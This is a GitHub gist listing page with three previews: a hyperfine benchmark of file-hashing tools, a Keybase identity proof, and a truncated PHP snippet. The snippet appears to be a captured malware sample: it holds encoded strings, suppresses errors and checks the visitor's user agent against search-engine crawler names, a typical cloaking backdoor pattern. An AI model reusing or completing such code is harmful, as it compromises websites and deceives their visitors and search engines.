Skip to content

Instantly share code, notes, and snippets.

froztbyte@bambam b3 % hyperfine -r 50 'b3sum debian-10.10.0-arm64-netinst.iso' 'shasum -a 256 debian-10.10.0-arm64-netinst.iso' 'b2sum debian-10.10.0-arm64-netinst.iso'
Benchmark #1: b3sum debian-10.10.0-arm64-netinst.iso
Time (mean ± σ): 74.2 ms ± 4.9 ms [User: 473.3 ms, System: 24.7 ms]
Range (min … max): 69.3 ms … 88.9 ms 50 runs
Benchmark #2: shasum -a 256 debian-10.10.0-arm64-netinst.iso
Time (mean ± σ): 862.0 ms ± 8.3 ms [User: 825.8 ms, System: 31.8 ms]
Range (min … max): 854.3 ms … 898.9 ms 50 runs
Benchmark #3: b2sum debian-10.10.0-arm64-netinst.iso
@froztbyte
froztbyte / keybase.md
Last active August 29, 2015 14:07
keybase.md

Keybase proof

I hereby claim:

  • I am froztbyte on github.
  • I am froztbyte (https://keybase.io/froztbyte) on keybase.
  • I have a public key whose fingerprint is 1A92 6061 1F0D 1531 9BE6 465E 474E 16D0 F70C 7CC9

To claim this, I am signing this object:

@froztbyte
froztbyte / -
Created September 11, 2013 12:13
<?php
$narmyi ="y0jNzKsCAA==";
$sakawhat="S87ILMnJz1NWVgYA";
$sar="yyjJzEvJTK1ySM9NzMzRS87PBQA=";
@error_reporting(4);
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
{